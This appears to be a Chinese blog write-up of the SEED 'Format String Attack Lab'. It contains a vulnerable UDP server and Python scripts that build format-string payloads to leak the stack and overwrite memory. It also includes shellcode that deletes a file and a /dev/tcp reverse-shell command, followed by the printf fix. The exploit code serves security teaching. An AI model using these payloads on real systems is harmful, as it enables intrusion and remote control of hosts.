mdzzname
mdzzname

信息安全 SEED Lab6 Format String Attack Lab

这个实验主要是进行格式化字符串攻击,先用下面命令关闭系统的地址随机化功能。

 sudo sysctl -w kernel.randomize_va_space=0

 

1. Task 1

存在格式化字符串漏洞的程序代码如下:

#include 
#include 
#include 
#include 
#include 
#include 

#define PORT 9090

/* Changing this size will change the layout of the stack.
* We have added 2 dummy arrays: in main() and myprintf().
* Instructors can change this value each year, so students
* won’t be able to use the solutions from the past.
* Suggested value: between 0 and 300 */
#ifndef DUMMY_SIZE
#define DUMMY_SIZE 100
#endif

char *secret = "A secret message\n";
unsigned int target = 0x11223344;

void myprintf(char *msg)
{
    uintptr_t framep;
    // Copy the ebp value into framep, and print it out
    asm("movl %%ebp, %0" : "=r"(framep));
    printf("The ebp value inside myprintf() is: 0x%.8x\n", framep);

    /* Change the size of the dummy array to randomize the parameters
    for this lab. Need to use the array at least once */
    char dummy[DUMMY_SIZE]; memset(dummy, 0, DUMMY_SIZE);

    // This line has a format string vulnerability
    printf(msg);

    printf("The value of the ’target’ variable (after): 0x%.8x\n", target);
}

void main()
{
    struct sockaddr_in server;
    struct sockaddr_in client;
    int clientLen;
    char buf[1500];

    /* Change the size of the dummy array to randomize the parameters
    for this lab. Need to use the array at least once */
    char dummy[DUMMY_SIZE]; memset(dummy, 0, DUMMY_SIZE);

    printf("The address of the input array: 0x%.8x\n", (unsigned) buf);


    int sock = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
    memset((char *) &server, 0, sizeof(server));
    server.sin_family = AF_INET;
    server.sin_addr.s_addr = htonl(INADDR_ANY);
    server.sin_port = htons(PORT);

    if (bind(sock, (struct sockaddr *) &server, sizeof(server)) < 0)
        perror("ERROR on binding");

    while (1) {
        bzero(buf, 1500);
        recvfrom(sock, buf, 1500-1, 0, (struct sockaddr *) &client, &clientLen);
        myprintf(buf);
    }
    close(sock);
}

使用下面的命令进行编译

gcc -z execstack -o server server.c

运行一下,可以发现这就是简单地网络程序,接受tcp连接发来的字符串并打印。

信息安全 SEED Lab6 Format String Attack Lab_第1张图片

 

2. Task 2

这部分主要是让你熟悉在 myprintf 函数 中调用 printf 函数时栈上的空间布局 并回答问题。

信息安全 SEED Lab6 Format String Attack Lab_第2张图片

Q1: 标号为1, 2, 和 3 的地方的地址是多少?

A1: 从 server程序的运行结果中可以看出buf的地址为 0xbffff090, 即为标记3的地址。 myprintf中ebp值为0xbfffefe8, 所以标记2的地址为ebp+0x4 = 0xbfffefe8 + 0x4 = 0xbfffefec.至于标记1的地址,可以通过汇编代码计算出来,也可以通过调试时位置的相对偏移计算出来。

1. 通过汇编代码计算

如通过汇编代码计算,先使用下面的命令生成反汇编

objdump -S server > server.s

其中myprintf函数的反汇编代码如下:

080485eb :
 80485eb:	55                   	push   %ebp
 80485ec:	89 e5                	mov    %esp,%ebp
 80485ee:	81 ec 88 00 00 00    	sub    $0x88,%esp
 80485f4:	8b 45 08             	mov    0x8(%ebp),%eax
 80485f7:	89 45 84             	mov    %eax,-0x7c(%ebp)
 80485fa:	65 a1 14 00 00 00    	mov    %gs:0x14,%eax
 8048600:	89 45 f4             	mov    %eax,-0xc(%ebp)
 8048603:	31 c0                	xor    %eax,%eax
 8048605:	89 e8                	mov    %ebp,%eax
 8048607:	89 45 8c             	mov    %eax,-0x74(%ebp)
 804860a:	83 ec 08             	sub    $0x8,%esp
 804860d:	ff 75 8c             	pushl  -0x74(%ebp)
 8048610:	68 34 88 04 08       	push   $0x8048834
 8048615:	e8 16 fe ff ff       	call   8048430 
 804861a:	83 c4 10             	add    $0x10,%esp
 804861d:	83 ec 04             	sub    $0x4,%esp
 8048620:	6a 64                	push   $0x64
 8048622:	6a 00                	push   $0x0
 8048624:	8d 45 90             	lea    -0x70(%ebp),%eax
 8048627:	50                   	push   %eax
 8048628:	e8 83 fe ff ff       	call   80484b0 
 804862d:	83 c4 10             	add    $0x10,%esp
 8048630:	83 ec 0c             	sub    $0xc,%esp
 8048633:	ff 75 84             	pushl  -0x7c(%ebp)
 8048636:	e8 f5 fd ff ff       	call   8048430 
 804863b:	83 c4 10             	add    $0x10,%esp
 804863e:	a1 44 a0 04 08       	mov    0x804a044,%eax
 8048643:	83 ec 08             	sub    $0x8,%esp
 8048646:	50                   	push   %eax
 8048647:	68 60 88 04 08       	push   $0x8048860
 804864c:	e8 df fd ff ff       	call   8048430 
 8048651:	83 c4 10             	add    $0x10,%esp
 8048654:	90                   	nop
 8048655:	8b 45 f4             	mov    -0xc(%ebp),%eax
 8048658:	65 33 05 14 00 00 00 	xor    %gs:0x14,%eax
 804865f:	74 05                	je     8048666 
 8048661:	e8 fa fd ff ff       	call   8048460 <__stack_chk_fail@plt>
 8048666:	c9                   	leave  
 8048667:	c3                   	ret

我们先找到第二个printf的参数的地址,从上面的代码中,不难计算出,参数的地址为 ebp - 0x88 -0x8 - 0x4 - 0x4 + 0x10 - 0x4 - 0x4 - 0x4 - 0x4 + 0x10 - 0xc - 0x4 = ebp - 0x98.

ebp的值就是打印出的0xbfffefe8, 所以标记1的地址即为0xbfffefe8 - 0x98 = 0xbfffef50.

综上所述 标记 1, 2,3的地址分别为 0xbfffef50,0xbfffefec,0xbffff090。

2. 调试计算

同理也可以采用调试的时候获取相对偏移计算地址。

在myprintf中打下断点,并执行到断点处,可以查看到 此时 ebp = 0xbfffe428, esp = -xbfffe3a0

信息安全 SEED Lab6 Format String Attack Lab_第3张图片

再使用si, fin 执行到第二个printf处,可以看到参数的地址为0xbffffe390, 相对ebp的偏移为 0xbffffe390 - 0xbfffe428 = -0x98.

打印输出的myprintf函数的ebp地址为 0xbfffefe8,所以实际运行时printf参数地址为0xbfffefe8 - 0x98 = 0xbfffef50. 可以看到与上面通过汇编代码分析的一致,

其他两个地址与上面的一致,都是直接从打印输出中获得。

信息安全 SEED Lab6 Format String Attack Lab_第4张图片

Q2: 标号为1 和 3的地方距离是多少?

A2: 从Q1中可知, 标号为1和3的地址分别为 0xbfffef50,0xbffff090。所以相隔的距离为0xbffff090 - 0xbfffef50 = 0x140

 

 

3. Task 3

这部分主要是实施攻击让server程序崩溃,比较简单。

先新建一个badfile,该文件的内容为通过网络发送到server的数据。发送时使用下面命令即可。

cat badfile | nc -u 127.0.0.1 9090

这里我简单设置badfile文件内容为 %n, 尝试攻击可以发现攻击成功,server直接报错退出运行

如果攻击失败,可以尝试增加%n的个数,也可以尝试其他的字符串。

 

 

4. Task 4

这部分主要是通过攻击打印栈上的内容,生成badfile的辅助代码如下

#!/usr/bin/python3
import sys

# Initialize the content array
N = 1500
content = bytearray(0x0 for i in range(N))

# This line shows how to store an integer at offset 0
number = 0xbfffeeee
content[0:4] = (number).to_bytes(4,byteorder="little")

# This line shows how to store a 4-byte string at offset 4
content[4:8] = ("abcd").encode("latin-1")

# This line shows how to construct a string s with
# 12 of "%.8x", concatenated with a "%s"
s = "%.8x"*12 + "%s"

# The line shows how to store the string s at offset 8
fmt = (s).encode("latin-1")
content[8:8+len(fmt)] = fmt

# Write the content to badfile
file = open("badfile", "wb")
file.write(content)
file.close()

4.1 Task 4.A

这部分是计算打印到输入的buf的第一个四字节所需要的%x的个数。

在task 2 Q2中已经计算除了标记1和3之间的距离为0x140, 即0x140/4 = 80个四字节。

所以所需%x的个数为80个。

将上面生成badfile的py代码修改为如下所示

#!/usr/bin/python3
import sys

# Initialize the content array
N = 1500
content = bytearray(0x0 for i in range(N))

# This line shows how to store an integer at offset 0
number = 0xffffffff
content[0:4] = (number).to_bytes(4,byteorder="little")

# This line shows how to store a 4-byte string at offset 4
content[4:8] = ("abcd").encode("latin-1")

# This line shows how to construct a string s with
# 12 of "%.8x", concatenated with a "%s"
s = "%.8x"*80

# The line shows how to store the string s at offset 8
fmt = (s).encode("latin-1")
content[8:8+len(fmt)] = fmt

# Write the content to badfile
file = open("badfile", "wb")
file.write(content)
file.close()

生成badfile并进行攻击,输出如下,可以发现最后刚好输出了badfile的最前面的4个字节。同理最前面的四个乱码字符其实也是badfile的最前面4个字节,只是0xff并未编码为ascii中的任何字符,所以显示乱码,但后面的abcd是正常的输出。

信息安全 SEED Lab6 Format String Attack Lab_第5张图片

不难猜测,如果增加到81个%x则可以在后面输出abcd的ascii编码。尝试后输出如下。查看ascii编码表可以发现a的ascii编码为0x61,其他几个依次类推,这说明我们的

猜想是对的。

信息安全 SEED Lab6 Format String Attack Lab_第6张图片

 

4.1 Task 4.B

这部分主要是假设我们知道秘密字符串的地址,利用攻击输出字符串。

printf函数族支持的格式符如下,我们要传递一个地址过去,要想输出地址中的数据,只有%s能做到,其他都不行

信息安全 SEED Lab6 Format String Attack Lab_第7张图片

这里演示我们就以输出我们输入的字符串为例,其地址为 0xbffff090。

修改生成badfile的py如下

#!/usr/bin/python3
import sys

# Initialize the content array
N = 1500
content = bytearray(0x0 for i in range(N))

# This line shows how to store an integer at offset 0
number = 0xbffff090
content[0:4] = (number).to_bytes(4,byteorder="little")

# This line shows how to store a 4-byte string at offset 4
content[4:8] = ("abcd").encode("latin-1")

# This line shows how to construct a string s with
# 12 of "%.8x", concatenated with a "%s"
s = "%.8x"*79 + "%s"

# The line shows how to store the string s at offset 8
fmt = (s).encode("latin-1")
content[8:8+len(fmt)] = fmt

# Write the content to badfile
file = open("badfile", "wb")
file.write(content)
file.close()

生成badfile并攻击,输出如下,可以看到在后面输出了我们输入的字符串,以4个乱码字符串开始,紧接着为abcd,后面是一堆%.8x

信息安全 SEED Lab6 Format String Attack Lab_第8张图片

 

 

5. Task 5

这部分主要是通过攻击修改程序的内存

5.1 Task 5.A

这部分主要是修改target的值为另一个不一样的值即可。首先我们要找出target的地址,这里我们直接查看myprintf函数汇编代码,其中关于第3个printf调用的代码如下:

 8048636:	e8 f5 fd ff ff       	call   8048430 
 804863b:	83 c4 10             	add    $0x10,%esp
 804863e:	a1 44 a0 04 08       	mov    0x804a044,%eax
 8048643:	83 ec 08             	sub    $0x8,%esp
 8048646:	50                   	push   %eax
 8048647:	68 60 88 04 08       	push   $0x8048860
 804864c:	e8 df fd ff ff       	call   8048430

结合C源码从中可以看出target的地址为0x804a044。由此构造生成badfile的py代码如下:

#!/usr/bin/python3
import sys

# Initialize the content array
N = 1500
content = bytearray(0x0 for i in range(N))

# This line shows how to store an integer at offset 0
number = 0x804a044
content[0:4] = (number).to_bytes(4,byteorder="little")

# This line shows how to store a 4-byte string at offset 4
content[4:8] = ("abcd").encode("latin-1")

# This line shows how to construct a string s with
# 12 of "%.8x", concatenated with a "%s"
s = "%.8x"*79 + "%n"

# The line shows how to store the string s at offset 8
fmt = (s).encode("latin-1")
content[8:8+len(fmt)] = fmt

# Write the content to badfile
file = open("badfile", "wb")
file.write(content)
file.close()

攻击后的输出如下,原本target的值为0x11223344,现在被修改为了0x280

信息安全 SEED Lab6 Format String Attack Lab_第9张图片

 

 

5.1 Task 5.B

这部分是通过攻击将target的值修改为0x500。由于在task5.A中,已经可以设置target为0x280,距离目标还差0x500 - 0x280 = 0x280 =  640个字符。再加上原本%.8x应该输出的8个字符,所以最后一个应该填写%.648x。最后生成badfile的py代码中设置s的关键一行改成如下:

s = "%.8x"*78 + "%.648x" + "%n"

生成badfile并进行攻击,输出如下,可以看到target的值成功被改成了0x500

信息安全 SEED Lab6 Format String Attack Lab_第10张图片

 

5.1 Task 5.C

这部分是把target的值改成0xff990000。如果仍然采用前面的方法,会出现输出耗时过长和其他问题。我们将0xff990000分成前后两部分,前半部分为0xff99 = 65433,

所以需要打印65433个字符,后半部分0x0000,我们可以通过打印0x10000 = 65536个字符造成溢出使得写入0x0000。中间相差了65536-65433 = 103个字符。

target的低2个字节地址为 0x804a044, 高2个字节地址为0x804a046。由于改写高2个字节所需的打印字符串(65433个) 小于低2个字节所需打印字符数,所以我们先处理高2个字节,我们把高两个字节的地址0x804a046放在输入数据最前端, 中间仍然放一个4字节的abcd用于输出填充前后两部分所需打印字符数量的差异,再后面放第2个字节的地址0x804a044. 按task5.B分析最后一个%x中的数字应该改成0xff99 - 0x280 + 8 = 0xfd21 = 64801个, 由于相比task5.B 多放了一个地址,其会输出4个字符,所以实际填充64801-4 = 64797个,后面再加上一个%hn, 即可完成对高2个字节的修改 。中间再塞一个%.103x, 最后塞一个 %hn, 即可完成对低2个字节的修改。

最后的生成badfile的exploit.py代码如下:

#!/usr/bin/python3
import sys

# Initialize the content array
N = 1500
content = bytearray(0x0 for i in range(N))

# This line shows how to store an integer at offset 0
number = 0x804a046
content[0:4] = (number).to_bytes(4,byteorder="little")

# This line shows how to store a 4-byte string at offset 4
content[4:8] = ("abcd").encode("latin-1")

# This line shows how to store an integer at offset 0
number = 0x804a044
content[8:12] = (number).to_bytes(4,byteorder="little")

# This line shows how to construct a string s with
# 12 of "%.8x", concatenated with a "%s"
s = "%.8x"*78 + "%.64797x" + "%hn" + "%.103x" + "%hn"

# The line shows how to store the string s at offset 8
fmt = (s).encode("latin-1")
content[12:12+len(fmt)] = fmt

# Write the content to badfile
file = open("badfile", "wb")
file.write(content)
file.close()

生成badfile并进行攻击,输出如下,可以看到target的值已经成功被改成了0xff990000

信息安全 SEED Lab6 Format String Attack Lab_第11张图片

 

 

6. Task 6

这部分主要是通过攻击注入代码并删除指定文件,具体思路就是将代码作为数据发送到栈上的缓冲区中,并通过攻击修改返回地址,使其跳转到shellcode,从而删除文件

首先我们要找到printf的返回地址及其地址。调试执行到myprintf函数中的第二个printf函数。在task2中我们已经知道标记 1, 2,3的地址分别为 0xbfffef50,0xbfffefec,0xbffff090。标记2中的内容就是返回地址,也就是说我们要将0xbfffefec位置的内容改成shellcode的起始地址。buf的地址为0xbffff090, buf为1500字节,末地址为0xbffff090 + 1500 - 1 = 0xbffff66b, shellcode的地址会比这个值略大一些,这里我们还是按照task5.c中的方法去进行修改。

在task5.c中,要修改为0xff990000, 这里要修改为0xbffff090-0xbffff66b之间的某个值。前半段为0xbfff,后半段为0xf090-0xf66b。两者相差最大为0xf66b-0xbfff=0x366c=13932, 即最大可用五位数表示。因此我们将task5.c中的代码的关键行改成下面的模板

s = "%.8x"*78 + "%.64797x" + "%hn" + "%.00103x" + "%hn"

其中 "%.64797x" 和 "%.00103x" 可以固定为5位,不够直接补0即可,具体数字再计算。

对于高2字节固定为0xbfff, 所以先处理高位,其地址为0xbfffefec + 2 = 0xbfffefee, 要填充的数组我们通过相对偏移进行计算0xff99 - 0xbfff + 64797 = 48515。因此第一个填充的数为 "%.48515x"。上面的代码变为

s = "%.8x"*78 + "%.48515x" + "%hn" + "%.00103x" + "%hn"

这时可以计算shellcode的地址了,即s后一个字节的地址,这里我们直接稍微修改exploit.py计算shellcode地址

#!/usr/bin/python3
import sys

# Initialize the content array
N = 1500
content = bytearray(0x0 for i in range(N))

# This line shows how to store an integer at offset 0
number = 0xbfffefee
content[0:4] = (number).to_bytes(4,byteorder="little")

# This line shows how to store a 4-byte string at offset 4
content[4:8] = ("abcd").encode("latin-1")

# This line shows how to store an integer at offset 0
number = 0xbfffefec
content[8:12] = (number).to_bytes(4,byteorder="little")

# This line shows how to construct a string s with
# 12 of "%.8x", concatenated with a "%s"
s = "%.8x"*78 + "%.064797x" + "%hn" + "%.00103x" + "%hn"

# The line shows how to store the string s at offset 8
fmt = (s).encode("latin-1")
print("shellcode addr: ", hex(12 + len(fmt) + 0xbffff090)) # addr of buf is 0xbffff090
content[12:12+len(fmt)] = fmt

# Write the content to badfile
file = open("badfile", "wb")
file.write(content)
file.close()

输出如下,可知shellcode的地址为0xbffff1ea, 后半段-前半段=0xf1ea-0xbfff = 12779字节。所以修改关键行的第二处为 "%.12779x"

最后将恶意代码放在关键行的后面即可,得到的exploit.py 如下(要注意下面代码标号1处有4个空格,多了少了会报段错误)

#!/usr/bin/python3
import sys

# Initialize the content array
N = 1500
content = bytearray(0x0 for i in range(N))

# This line shows how to store an integer at offset 0
number = 0xbfffefee
content[0:4] = (number).to_bytes(4,byteorder="little")

# This line shows how to store a 4-byte string at offset 4
content[4:8] = ("abcd").encode("latin-1")

# The following code runs "/bin/bash -c ’/bin/rm /tmp/myfile’"
malicious_code= (
    # Push the command ’/binbash’ into stack ( is equivalent to /)
    "\x31\xc0" # xorl %eax,%eax
    "\x50" # pushl %eax
    "\x68""bash" # pushl "bash"
    "\x68""" # pushl ""
    "\x68""/bin" # pushl "/bin"
    "\x89\xe3" # movl %esp, %ebx

    # Push the 1st argument ’-ccc’ into stack (-ccc is equivalent to -c)
    "\x31\xc0" # xorl %eax,%eax
    "\x50" # pushl %eax
    "\x68""-ccc" # pushl "-ccc"
    "\x89\xe0" # movl %esp, %eax

    # Push the 2nd argument into the stack:
    # ’/bin/rm /tmp/myfile’
    # Students need to use their own VM’s IP address
    "\x31\xd2" # xorl %edx,%edx
    "\x52" # pushl %edx
    "\x68""    " # pushl (an integer) ➀
    "\x68""ile " # pushl (an integer)
    "\x68""/myf" # pushl (an integer)
    "\x68""/tmp" # pushl (an integer)
    "\x68""/rm " # pushl (an integer)
    "\x68""/bin" # pushl (an integer) ➁
    "\x89\xe2" # movl %esp,%edx

    # Construct the argv[] array and set ecx
    "\x31\xc9" # xorl %ecx,%ecx
    "\x51" # pushl %ecx
    "\x52" # pushl %edx
    "\x50" # pushl %eax
    "\x53" # pushl %ebx
    "\x89\xe1" # movl %esp,%ecx

    # Set edx to 0
    "\x31\xd2" #xorl %edx,%edx
    
    # Invoke the system call
    "\x31\xc0" # xorl %eax,%eax
    "\xb0\x0b" # movb $0x0b,%al
    "\xcd\x80" # int $0x80
).encode("latin-1")

# ret_code = (
#     "\xff\x35\x3b\x86\x04\x08" # push 0x804863b 
#     "\xc3"                     # ret
# ).encode(’latin-1’)

# This line shows how to store an integer at offset 0
number = 0xbfffefec
content[8:12] = (number).to_bytes(4,byteorder="little")

# This line shows how to construct a string s with
# 12 of "%.8x", concatenated with a "%s"
s = "%.8x"*78 + "%.48515x" + "%hn" + "%.12779x" + "%hn"

# The line shows how to store the string s at offset 8
fmt = (s).encode("latin-1")
print("shellcode addr: ", hex(12 + len(fmt) + 0xbffff090)) # addr of buf is 0xbffff090
content[12:12+len(fmt)] = fmt
content[12+len(fmt):12+len(fmt)+len(malicious_code)] = malicious_code

# Write the content to badfile
file = open("badfile", "wb")
file.write(content)
file.close()

检查发现上面的代码的shellcode部分可能被富文本编辑器处理后存在显示问题,会消失,下面是shellcode的截图,请仔细核对

信息安全 SEED Lab6 Format String Attack Lab_第12张图片

下面进行攻击,先新建/tmp/file文件,再生成badfile进行攻击

信息安全 SEED Lab6 Format String Attack Lab_第13张图片

输出如下,再查看/tmp/myfile文件,发现已经被删除了

信息安全 SEED Lab6 Format String Attack Lab_第14张图片

 

7. Task 7

这部分主要是利用攻击创建反向shell,比较简单,只要将命令改成下面的即可

/bin/bash -c "/bin/bash -i > /dev/tcp/127.0.0.1/7070 0<&1 2>&1"

最后的exploit.py如下:

#!/usr/bin/python3
import sys

# Initialize the content array
N = 1500
content = bytearray(0x0 for i in range(N))

# This line shows how to store an integer at offset 0
number = 0xbfffefee
content[0:4] = (number).to_bytes(4,byteorder="little")

# This line shows how to store a 4-byte string at offset 4
content[4:8] = ("abcd").encode("latin-1")

# The following code runs "/bin/bash -c ’/bin/rm /tmp/myfile’"
malicious_code= (
    # Push the command ’/binbash’ into stack ( is equivalent to /)
    "\x31\xc0" # xorl %eax,%eax
    "\x50" # pushl %eax
    "\x68""bash" # pushl "bash"
    "\x68""" # pushl ""
    "\x68""/bin" # pushl "/bin"
    "\x89\xe3" # movl %esp, %ebx

    # Push the 1st argument ’-ccc’ into stack (-ccc is equivalent to -c)
    "\x31\xc0" # xorl %eax,%eax
    "\x50" # pushl %eax
    "\x68""-ccc" # pushl "-ccc"
    "\x89\xe0" # movl %esp, %eax

    # Push the 2nd argument into the stack:
    # ’/bin/rm /tmp/myfile’
    # Students need to use their own VM’s IP address
    "\x31\xd2" # xorl %edx,%edx
    "\x52" # pushl %edx
    "\x68""    " # pushl (an integer) ➀
    "\x68"">&1 " # pushl (an integer) ➁
    "\x68""&1 2" # pushl (an integer) ➁
    "\x68""0 0<" # pushl (an integer) ➁
    "\x68""/707" # pushl (an integer) ➁
    "\x68"".0.1" # pushl (an integer) ➁
    "\x68""27.0" # pushl (an integer) ➁
    "\x68""cp/1" # pushl (an integer) ➁
    "\x68""ev/t" # pushl (an integer) ➁
    "\x68""> /d" # pushl (an integer) ➁
    "\x68"" -i " # pushl (an integer) ➁
    "\x68""bash" # pushl (an integer) ➁
    "\x68""" # pushl (an integer) ➁
    "\x68""/bin" # pushl (an integer) ➁
    "\x89\xe2" # movl %esp,%edx

    # Construct the argv[] array and set ecx
    "\x31\xc9" # xorl %ecx,%ecx
    "\x51" # pushl %ecx
    "\x52" # pushl %edx
    "\x50" # pushl %eax
    "\x53" # pushl %ebx
    "\x89\xe1" # movl %esp,%ecx

    # Set edx to 0
    "\x31\xd2" #xorl %edx,%edx
    
    # Invoke the system call
    "\x31\xc0" # xorl %eax,%eax
    "\xb0\x0b" # movb $0x0b,%al
    "\xcd\x80" # int $0x80
).encode("latin-1")

# ret_code = (
#     "\xff\x35\x3b\x86\x04\x08" # push 0x804863b 
#     "\xc3"                     # ret
# ).encode(’latin-1’)

# This line shows how to store an integer at offset 0
number = 0xbfffefec
content[8:12] = (number).to_bytes(4,byteorder="little")

# This line shows how to construct a string s with
# 12 of "%.8x", concatenated with a "%s"
s = "%.8x"*78 + "%.48515x" + "%hn" + "%.12779x" + "%hn"

# The line shows how to store the string s at offset 8
fmt = (s).encode("latin-1")
print("shellcode addr: ", hex(12 + len(fmt) + 0xbffff090)) # addr of buf is 0xbffff090
content[12:12+len(fmt)] = fmt
content[12+len(fmt):12+len(fmt)+len(malicious_code)] = malicious_code

# Write the content to badfile
file = open("badfile", "wb")
file.write(content)
file.close()

检查发现上面的代码的shellcode部分可能被富文本编辑器处理后存在显示问题,会消失,下面是shellcode的截图,请仔细核对

信息安全 SEED Lab6 Format String Attack Lab_第15张图片

用nc命令开启一个进程监听7070端口,再进行攻击,可以看到成功连上了反向shell,且拥有root权限。

信息安全 SEED Lab6 Format String Attack Lab_第16张图片

 

8. Task 8

这部分主要是分析原因和修复。编译server.c时的warning如下

信息安全 SEED Lab6 Format String Attack Lab_第17张图片

这个warning就是指非常量字符串作为模板字符串,且没有格式化参数。要解决这个warning,只要将printf(msg) 改成 printf("%s", msg)即可

修改之后再编译可以发现不再报warning

修改之后,我们再尝试task4中的攻击,输出如下,可以发现,输出的都是我们构造的输入

信息安全 SEED Lab6 Format String Attack Lab_第18张图片

下面是前面task4的攻击输出,对比可以发现,输出的而不是栈上的内容,而是我们构造的输入,所以我们的攻击失败了

信息安全 SEED Lab6 Format String Attack Lab_第19张图片

原因其实就是因为格式化的字符串是程序自己提供的,这个字符串才决定printf的行为,修改之后,外界无法影响到此字符串,因此攻击失败。

你可能感兴趣的:(信息安全,信息安全,SEED)

  • 详细的等保测评攻略就在这里 快快小毛毛 网络网络安全系统安全
    信息安全等级保护,是对信息和信息载体按照重要性等级分级别进行保护的一种工作。目前我国实行的是等保2.0于2019年12月1日开始实施,等保2.0从传统的信息系统,转变成具有基础信息网络平台的多种新兴技术对象,即具有网络服务,有数据的网络服务平台都可以成为新兴的测评对象。等保2.0备案从原来的自主定级改变成系统定级,才能得到公安机关的备案,关于等保测评详细攻略如下:等保2.0定级步骤:确定定级对象—
  • 等保测评中的关键技术挑战与应对策略 亿林数据 网络安全等保测评
    在信息安全领域,等保测评(信息安全等级保护测评)作为确保信息系统安全性的重要手段,其过程中不可避免地会遇到一系列技术挑战。这些挑战不仅考验着企业的技术实力,也对其安全管理水平提出了更高要求。本文将深入探讨等保测评中的关键技术挑战,并提出相应的应对策略。一、等保测评中的关键技术挑战1.复杂系统架构的评估难度随着信息技术的快速发展,企业信息系统的架构日益复杂,包括分布式系统、微服务架构、云计算环境等。
  • CDGA学习笔记三-《数据安全》 zy_chris 网络安全
    七、数据安全7.1引言数据安全包括安全策略和过程的规划、建立与执行,为数据和信息资产提供正确的身份验证、授权、访问和审计。要求来自以下方面:(1)利益相关方(2)政府法规(3)特定业务关注点(4)合法访问需求(5)合同义务7.1.1业务驱动因素1、降低风险信息安全首先对组织数据进行分级分类,对组织数据进行分类分级的整个流程:1)识别敏感数据资产并分类分级2)在企业中查找敏感数据3)确定保护每项资产
  • 学习笔记:FW内容安全概述 TKE_yinian
    内容安全概述信息安全概述主要威胁关于防护简介内容安全威胁应用层威胁内容安全技术WEB安全应用安全入侵防御检测邮件安全数据安全网络安全反病毒全局环境感知沙箱检测信息安全概述•信息安全是对信息和信息系统进行保护,防止未授权的访问、使用、泄露、中断、修改、破坏并以此提供保密性、完整性和可用性。•为关键资产提供机密性、完整性和可用性(CIA三元组)保护是信息安全的核心目标。CIA(Confidential
  • 信创环境下源代码防泄露解决方案 Felixwb 网络服务器
    在当今数字化时代,信息安全已成为企业生存与发展的基石,尤其是在信息技术应用创新(信创)环境下,数据保护更是被提升至前所未有的高度。SDC沙盒防泄露系统以其独特的技术架构和卓越的安全性能,在信创环境中构筑起一道坚不可摧的数据防护墙,有效保障了企业数据的安全与隐私。SDC沙盒防泄露系统是一款专为解决数据泄露问题而设计的高端安全产品。该系统通过构建一个隔离的、可控的执行环境(即“沙盒”),对敏感数据的访
  • qt 创建随机数 入梦游 qt
    qt中有两种创建随机数的方法,一种是旧方法,一种是新方法目录旧方法:已过时intqrand()voidqsrand(uintseed)Example新方法QRandomGenerator::global()->bouned(inthighest)QRandomGenerator::global()->generate()更多旧方法:已过时intqrand()生成一个伪随机数,可以使用qsrand(
  • 国家等保 2.0 时代,你的移动安全要如何防护? Reneeeeee412
    移动互联时代,什么对企业最重要?是人才?是技术?在勒索病毒“WannaCry”肆虐全球之后企业更加意识到安全才是关键所在跃至2.0时代国家等级保护范围扩展到新领域在信息安全领域,国家提出了最为深远的保障制度——信息安全等级保护制度。在2017年5月等保制度顺应时代要求一跃升级到2.0,不仅安全等级的评定条件更加严格,保护要求也扩展到移动互联、云计算、大数据、物联网和工业控制等新技术和新应用领域。在
  • 记录一下gitlab社区版的安装教程 心之所想,行则将至 gitlab服务器linux
    目录1.更新系统软件包2.安装必要的依赖3.添加GitLab源3.1对于GitLabEnterpriseEdition(EE):3.2对于GitLabCommunityEdition(CE):4.安装GitLab4.1安装GitLabEnterpriseEdition(EE):4.2安装GitLabCommunityEdition(CE):5.遇到启动不起来的问题,试一下以下命令5.1重新配置和重
  • 推动国密SSL发展的建议与策略 bilicute ssl网络协议网络
    摘要:国密SSL作为我国网络安全的重要组成部分,其发展对于保障国家信息安全具有重要意义。本文针对国密SSL当前发展现状,提出了几点发展建议,旨在推动国密SSL技术的广泛应用和市场竞争力。一、引言国密SSL(SecureSocketsLayer)是指采用国家商用密码算法的SSL证书,它在我国网络安全体系中扮演着至关重要的角色。随着网络信息化的快速发展,国密SSL的应用前景日益广阔。然而,面对国际SS
  • 浅析‖医疗行业数据安全 等保星视界
    最近小编接触到了医疗行业,猛然发觉信息化技术当前真的是深入应用到了医院的日常经营发展中,医院整体的管理运营全都面向系统化,让医院的管理效率、质量都纷纷得以提升。这也使得信息安全管理工作占据了更加重要的位置。小编总结了下医院信息安全管理的主要工作大概包括这几点:l信息系统网络安全l备份信息记录安全l计算机设备病毒防治l医院信息管理系统平台安全等想必大家也都有所了解,医疗记录包含大量敏感信息:如病患的
  • 信息安全国内外现状及技术要求示例(R155/R156) mini积木 信息安全安全mcu
    国际政策、法规的现状与趋势鉴于对交通安全、社会安全甚至国家安全的重要影响,汽车网络安全、数据安全得到各相关国家和地区的高度重视,纷纷出台相关法规、标准。信息安全法规R155法规适用范围覆盖了乘用车及商用车,适用于M类、N类车型,装备了至少一个ECU的O类车型,以及具备L3及以上自动驾驶功能的L6和L7类车型。此法规适合于1958协议国(包括欧洲、日本、俄罗斯、澳大利亚等)。根据欧盟要求,从2022
  • NISP 一级 —— 考证笔记合集 SRC_BLUE_17 网络安全资源导航#网络安全相关笔记笔记网络安全证书获取NISP
    该笔记为导航目录,在接下来一段事件内,我会每天发布我关于考取该证书的相关笔记。当更新完成后,此条注释会被删除。第一章信息安全概述1.1信息与信息安全1.2信息安全威胁1.3信息安全发展阶段与形式1.4信息安全保障1.5信息系统安全保障第二章信息安全基础技术2.1密码学2.2数字证书与公钥基础设施2.3身份认证2.4访问控制2.5安全审计第三章网络安全防护技术3.1网络基础知识3.2网络安全威胁3.
  • 信息安全、网络安全、网络空间安全傻傻分不清? 亿林科技网络安全 web安全安全
    信息安全、网络安全、网络空间安全:三个概念的解析与区分随着信息技术的迅猛发展,信息安全、网络安全、网络空间安全这三个概念逐渐进入人们的视野。虽然它们密切相关,但在含义上却有所区别。本文将深入探讨这三个概念的定义、内涵及其区别。一、信息安全信息安全是指保护信息免受未经授权的访问、使用、破坏或泄露的科学与技术手段的总和。其核心目标是确保信息的机密性、完整性和可用性。信息安全涉及的范围包括计算机系统、网
  • oracle数据库安装和配置:详细教程 liyy614 oracle人工智能AI编程数据库ai编程
    安装和配置Oracle数据库是一个较为复杂的过程,需要按照一定的步骤来操作。以下是基于OracleDatabase19c的安装和配置教程,适用于Windows环境。请根据你的具体环境和版本进行适当的调整。1.下载Oracle数据库软件访问Oracle官方网站下载OracleDatabase19cExpressEdition或EnterpriseEdition的安装包。确保下载的版本与你的操作系统兼
  • 干货 ‖ 三分钟让你区分“等级保护、风险评估和安全测评” 等保星视界
